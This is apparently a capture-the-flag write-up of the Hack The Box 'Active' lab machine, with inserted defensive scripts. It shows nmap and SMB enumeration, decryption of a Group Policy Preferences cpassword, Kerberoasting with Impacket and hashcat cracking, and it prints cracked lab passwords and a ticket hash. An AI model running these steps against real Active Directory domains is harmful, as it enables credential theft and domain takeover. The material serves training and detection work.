One of the first boxes I did that actually required me to attack Active Directory components (hence the name). I really learned a lot of new techniques. Let's jump in!
Enumeration
As always, we start with our default nmap scan:
[bash]
nmap -sC -sV -p- -oA initial 10.10.10.100
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-02 18:13 UTC
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49172/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1m18s, deviation: 0s, median: -1m18s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2018-08-02 18:13:42
|_ start_date: 2018-08-02 09:21:01
[/bash]
Wow, that's a lot of services running. Let's see what we have:
- DNS on port 53
- LDAP on port 389/3268 (servicing the active.htb domain)
- Something on port 445 (I suspect SMB)
- Some HTTP services on port 593/47001
- Lots of Remote Procedure Calls
I first focused on the HTTP services, using nikto and gobuster. This did not give me any (usable) results, so I decided to look into port 445, hoping for SMB. I fired up the SMB scanner from Metasploit to see what we could get:
[bash]
msf auxiliary(scanner/smb/smb2) > info
Name: SMB 2.0 Protocol Detection
Module: auxiliary/scanner/smb/smb2
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
hdm <[email protected]>
Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS                    yes       The target address range or CIDR identifier
RPORT    445              yes       The target port (TCP)
THREADS  1                yes       The number of concurrent threads
Description:
Detect systems that support the SMB 2.0 protocol
msf auxiliary(scanner/smb/smb2) > set RHOSTS 10.10.10.100
RHOSTS => 10.10.10.100
msf auxiliary(scanner/smb/smb2) > run
[+] 10.10.10.100:445 - 10.10.10.100 supports SMB 2 [dialect 255.2] and has been online for 9 hours
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[/bash]
Yep, it's Samba alright, version 2. So that rules out EternalBlue, as used on the Blue machine I posted about before.
I tried enum4linux to get more info, but ended up with all kinds of error messages. I switched to nullinux, which did give me some interesting results:
[bash]
python nullinux.py -all 10.10.10.100
Starting nullinux v5.3.0 | 08-03-2018 09:53
[*] Enumerating Shares for: 10.10.10.100
Shares                          Comments
-------------------------------------------
\\10.10.10.100\ADMIN$           Remote Admin
\\10.10.10.100\C$               Default share
\\10.10.10.100\IPC$
\\10.10.10.100\NETLOGON         Logon server share
\\10.10.10.100\Replication
\\10.10.10.100\SYSVOL           Logon server share
\\10.10.10.100\Users
[*] Enumerating: \\10.10.10.100\Replication
. D 0 Sat Jul 21 10:37:44 2018
.. D 0 Sat Jul 21 10:37:44 2018
active.htb D 0 Sat Jul 21 10:37:44 2018
[*] Enumerating Domain Information for: 10.10.10.100
[-] Could not attain Domain SID
[*] Enumerating querydispinfo for: 10.10.10.100
[*] Enumerating enumdomusers for: 10.10.10.100
[*] Enumerating LSA for: 10.10.10.100
[*] Performing RID Cycling for: 10.10.10.100
[-] RID Failed: Could not attain Domain SID
[*] Testing 10.10.10.100 for Known Users
[*] Enumerating Group Memberships for: 10.10.10.100
[-] No valid users or groups detected
[/bash]
We have some shares! Awesome. I used Nautilus (the default file browser in Kali) to see if I could access these shares. It seems that I can anonymously access the Users share. I find our user there: SVC_TGS. Browsing to the desktop gives us the user key.
Exploitation
While browsing the shares, it seems that I can anonymously access the Replication share as well. After browsing for some time, I find a file called groups.xml. Looking into this file, I notice something interesting:
[bash]
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
[/bash]
I've never seen this kind of file before, but am immediately interested in the cpassword entry. It seems that cpassword is the result of a bad implementation of password management by Microsoft, which was fixed with a patch way back. However, that patch only prevents you from creating new policies with stored passwords and does not remove the existing ones. I found a great explanation on the topic here and here. ADsecurity.org is an amazing site on AD security! It seems that there are multiple tools out there for decrypting this kind of password. I used gpp-decrypt and Gpprefdecrypt.py; both give the same result.
[bash]
python Gpprefdecrypt.py edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
[/bash]
We have the password! Nice. But where to use it...
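Because the patch leaves existing cpassword entries in place, the useful defender's check is to sweep SYSVOL for preference files that still carry one. The script below is an added example (mine, not the author's or any tool's code); it embeds a constructed copy of the Groups.xml shown above, and the list of other preference file names and account attributes is my assumption about which preference types store credentials.

```python
import base64
import xml.etree.ElementTree as ET
from pathlib import Path

# Preference files that can carry a cpassword attribute (Groups.xml is the one found above).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
ACCOUNT_ATTRS = ("userName", "accountName", "runAs")  # account attribute differs per type

# Constructed copy of the Groups.xml shown above, same cpassword value.
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>"""

def decode_cpassword(cpassword):
    """Return the raw AES-CBC ciphertext. GPP stores base64 without '=' padding,
    so restore it first; a valid value decodes to a multiple of 16 bytes."""
    return base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))

def find_cpasswords(xml_text, source="<inline>"):
    """One finding per preference item whose Properties still carry a cpassword."""
    findings = []
    for item in ET.fromstring(xml_text).iter():          # item = <User>, <Service>, ...
        for props in item.findall("Properties"):
            cpw = props.get("cpassword")
            if not cpw:                                  # absent or already blanked
                continue
            account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "?")
            findings.append({"file": source, "account": account,
                             "action": props.get("action", ""),
                             "changed": item.get("changed", ""),
                             "ciphertext_bytes": len(decode_cpassword(cpw))})
    return findings

def audit_sysvol(sysvol_root):
    """Walk a SYSVOL copy (or a mounted share) and collect every remaining cpassword."""
    findings = []
    for path in Path(sysvol_root).rglob("*.xml"):
        if path.name in GPP_FILES:
            try:
                findings += find_cpasswords(path.read_text(encoding="utf-8-sig"), str(path))
            except ET.ParseError:
                pass                                     # not a well-formed preference file
    return findings

if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"{f['file']}: {f['account']} has a cpassword "
              f"({f['ciphertext_bytes']} ciphertext bytes, last changed {f['changed']})")
```

Any hit means the credential should be treated as exposed to every domain user: rotate it and delete the preference item rather than just blanking the attribute.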
Privilege Escalation
Looking back at the initial nmap scan, I do see some Kerberos in there as well. This made me think of Kerberoasting. Let's see what we can find on this. I fire up Metasploit again:
[bash]
msf auxiliary(gather/kerberos_enumusers) > info
Name: Kerberos Domain User Enumeration
Module: auxiliary/gather/kerberos_enumusers
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Matt Byrne <[email protected]>
Basic options:
Name       Current Setting                                                      Required  Description
----       ---------------                                                      --------  -----------
DOMAIN     active.htb                                                           yes       The Domain Eg: demo.local
RHOST      10.10.10.100                                                         yes       The target address
RPORT      88                                                                   yes       The target port
Timeout    10                                                                   yes       The TCP timeout to establish connection and read data
USER_FILE  /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt  yes       Files containing usernames, one per line
Description:
This module will enumerate valid Domain Users via Kerberos from an
unauthenticated perspective. It utilizes the different responses
returned by the service for valid and invalid users.
References:
CVE: Not available
https://nmap.org/nsedoc/scripts/krb5-enum-users.html
msf auxiliary(gather/kerberos_enumusers) > run
[*] Validating options...
[*] Using domain: ACTIVE.HTB...
[*] 10.10.10.100:88 - Testing User: "root"...
[*] 10.10.10.100:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.100:88 - User: "root" does not exist
[*] 10.10.10.100:88 - Testing User: "admin"...
[*] 10.10.10.100:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.100:88 - User: "admin" does not exist
[*] 10.10.10.100:88 - Testing User: "test"...
[*] 10.10.10.100:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.100:88 - User: "test" does not exist
[*] 10.10.10.100:88 - Testing User: "guest"...
[*] 10.10.10.100:88 - KDC_ERR_CLIENT_REVOKED - Clients credentials have been revoked
[-] 10.10.10.100:88 - User: "guest" account disabled or locked out
[*] 10.10.10.100:88 - Testing User: "info"...
[*] 10.10.10.100:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.100:88 - User: "info" does not exist
[*] 10.10.10.100:88 - Testing User: "adm"...
[*] 10.10.10.100:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.100:88 - User: "adm" does not exist
[*] 10.10.10.100:88 - Testing User: "mysql"...
[*] 10.10.10.100:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.100:88 - User: "mysql" does not exist
[*] 10.10.10.100:88 - Testing User: "user"...
[*] 10.10.10.100:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.100:88 - User: "user" does not exist
[*] 10.10.10.100:88 - Testing User: "administrator"...
[*] 10.10.10.100:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.100:88 - User: "administrator" is present
[/bash]
So there is an Administrator account. I then realized that I could have used Impacket all this time. Let's see if we can get some hashes for the Administrator user. I use the password recovered from cpassword to authenticate to the domain:
[bash]
python GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies
Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon
--------------------  -------------  --------------------------------------------------------  -------------------  -------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 19:06:40  2018-07-30 17:17:40
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7a5631b150c67e6c40a4eaae2e600139$e0e88d46194f9f78d2c664442ccefe04b76b6e813314d5f7d36b8ac4a873015b556ca98117725a91583
[/bash]
We have the hash. Time to fire up hashcat.
[bash]
hashcat -m 13100 -a 0 administrator_hash.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v4.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel Xeon E312xx (Sandy Bridge), 2048/5931 MB allocatable, 8MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 5 secs
Session..........: hashcat
Status...........: Running
Hash.Type........: Kerberos 5 TGS-REP etype 23
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...0a76cb
Time.Started.....: Fri Aug  3 10:38:17 2018 (29 secs)
Time.Estimated...: Fri Aug  3 10:39:14 2018 (28 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 254.1 kH/s (8.86ms) @ Accel:16 Loops:1 Thr:64 Vec:8
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 7225344/14344385 (50.37%)
Rejected.........: 0/7225344 (0.00%)
Restore.Point....: 7225344/14344385 (50.37%)
Candidates.#1....: jackrayado -> jabo03
HWMon.Dev.#1.....: N/A
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7a5631b150c67e6c40a4eaae2e600139$e0e88d46194f9f78d2c664442ccefe04b76b6e813314d5f7d36b8ac4a873015b556ca98117725a9158311bbb842795da5f494bfeb7ac6a1e31dc0d6c921fa7b89fb69d12d2b7a438257417dd6d73cabe3753dde6a29e133d68339f2a93b848f01073c1fbf430d3d6ea708c417ec8eeac846f46c5f9cda1501460949dc369a190e9399d93aff674d4f3910367a71cf21313598d2d0c22b427b9c0e1b0a7af4731a11b74067432b03697b4f7d96ced9b38cd22ac94c96d730c2dfd65a57a57080ad6b3f9a136307c5462681b23d06b418a0dde475307f828f57f9b8930f5e85bdb42f0661243c453de2aaca0cbdb2f442794f3b675bfd8edd052d6fe41620784a633e1917033fb1a8de83b8ee139d63e878055998a774f86bae4c24eb20ea5f92ba8fac4c11e8e6bd2df75a1ad33735905b8ad3b256e85542b84f5b4ae6999005313440d48b79667bbc84945ac8600627b2aa5d8cfb4f19bd286886281f523a67d59c48d410b61c0be623987a03e8eedfa136c4dcf6eefe06a7d3aa19e12f26a23e315de89b3db75ecba5e4d733809bea11f31bc9de4453c400d096b13aea879494b4c1df19240fd416dd01beabf9a55fda0c5cc251bc5b679d7de14b2392d07eb4bfc27a4626c9f9351a92b2d55591827cee2fa0087ed21fb947ea78a0d178c3c408d098b4b2192b401cfcf3d7d1f4c91307d33b4a617f45677c82cba3f371b9d8e6729b5df17ab292d78b7c19c6bb7505000a33459b2d3bdcee9608caecee2fc965f98a15c6d7eba5071a59e7ced22f2b84117471e2d8a23bbe1a933aa0ab418f71f6b6f3e799bd0c96d3fa855c202d1a2795b6869b48aba75356b337655b07e3be228ca3cf22a25d1b6fd5f2bd5ef62c9a9f920228e8e5bd43b5c581316e4f4384599223283a288649cda963b408893c4fc700d2b377605abdbc4ad63c5138cef45f482cf04bce83b22055cde5982983556426379b47a9055d8d5722f4831d7d5295b5fb18f4b6356b4bfcf4392f6d0725c87067b5846611cad7d61eb5e4424cba6172291f39daca2fc85b960bb1194bb81dc4887ff6f40d4f0280c8e9329244685f81d57c5906ccd3f6d153176ee7541d35ff240f575a06694814a2f34d464f29308d113b625acdfb9f079f457c1366479437819c77c025d5c070ba6b9b4c7b964d6f5d4a50708557f5b919125fc675a0811fcaacc32f7aa7ac71f75b8b5476fbf44777d8a1e33cca17805a45cb90aa291ebf28062890a76cb:Ticketmaster1968
[/bash]
Game, set, match. We got the Administrator password: Ticketmaster1968. Use this password and the Administrator username to browse to the desktop of the Administrator user to get the root key.
In retrospect, I could also have used the following tools/methods:
- Run Invoke-Kerberoast.ps1 from PowerShell Empire to get all the users, then start using BloodHound for reconnaissance.
- Use Pass-the-Hash instead of brute-forcing (not necessary actually, but could have been nice).
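Seen from the domain controller, the GetUserSPNs request above leaves a Security-log event 4769 (service ticket requested) with TicketEncryptionType 0x17, the RC4 etype 23 that the hashcat mode 13100 hash encodes, for a service that runs under a user account. The detection below is an added example (mine, not the author's); the 4769 records are constructed, with real field names but made-up timestamps, a made-up second SPN and made-up client addresses.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # etype 23: the TicketEncryptionType behind a $krb5tgs$23$ hash

# Constructed Security-log 4769 (service ticket requested) events for this example. The field
# names follow the 4769 schema; the timestamps, the second SPN and the client IPs are made up.
SAMPLE_4769 = [
    {"time": "2018-07-30 17:17:40", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "Administrator", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"time": "2018-07-30 17:17:41", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"time": "2018-07-30 17:17:42", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.5"},
    {"time": "2018-07-30 17:18:05", "TargetUserName": "DC$@ACTIVE.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.100"},
    {"time": "2018-07-30 17:25:00", "TargetUserName": "jdoe@ACTIVE.HTB",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.52"},
]

def is_roastable_request(ev):
    """RC4 service ticket for a service that runs under a user account. Computer accounts
    (name ends in $) and krbtgt are normal traffic; a user-account SPN with etype 23 is not."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == RC4_HMAC
            and ev.get("Status", "0x0") == "0x0"
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")

def kerberoast_alerts(events, window=timedelta(minutes=5), threshold=2):
    """One alert per requesting account. Severity is 'high' when the account pulled
    `threshold` or more distinct roastable service tickets inside `window`."""
    per_requester = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            ts = datetime.strptime(ev["time"], "%Y-%m-%d %H:%M:%S")
            per_requester[ev["TargetUserName"]].append((ts, ev["ServiceName"], ev["IpAddress"]))
    alerts = []
    for requester, reqs in per_requester.items():
        reqs.sort()                                      # oldest request first
        services = sorted({svc for _, svc, _ in reqs})
        burst = len(services) >= threshold and reqs[-1][0] - reqs[0][0] <= window
        alerts.append({"requester": requester, "source": reqs[0][2], "services": services,
                       "severity": "high" if burst else "low"})
    return sorted(alerts, key=lambda a: a["requester"])

if __name__ == "__main__":
    for a in kerberoast_alerts(SAMPLE_4769):
        print(f"[{a['severity']}] {a['requester']} from {a['source']} got RC4 tickets for {a['services']}")
```

The lasting fix is on the account side: service accounts with SPNs need long random passwords (or a group managed service account) and AES-only encryption types, so an etype 23 ticket for them never exists to crack.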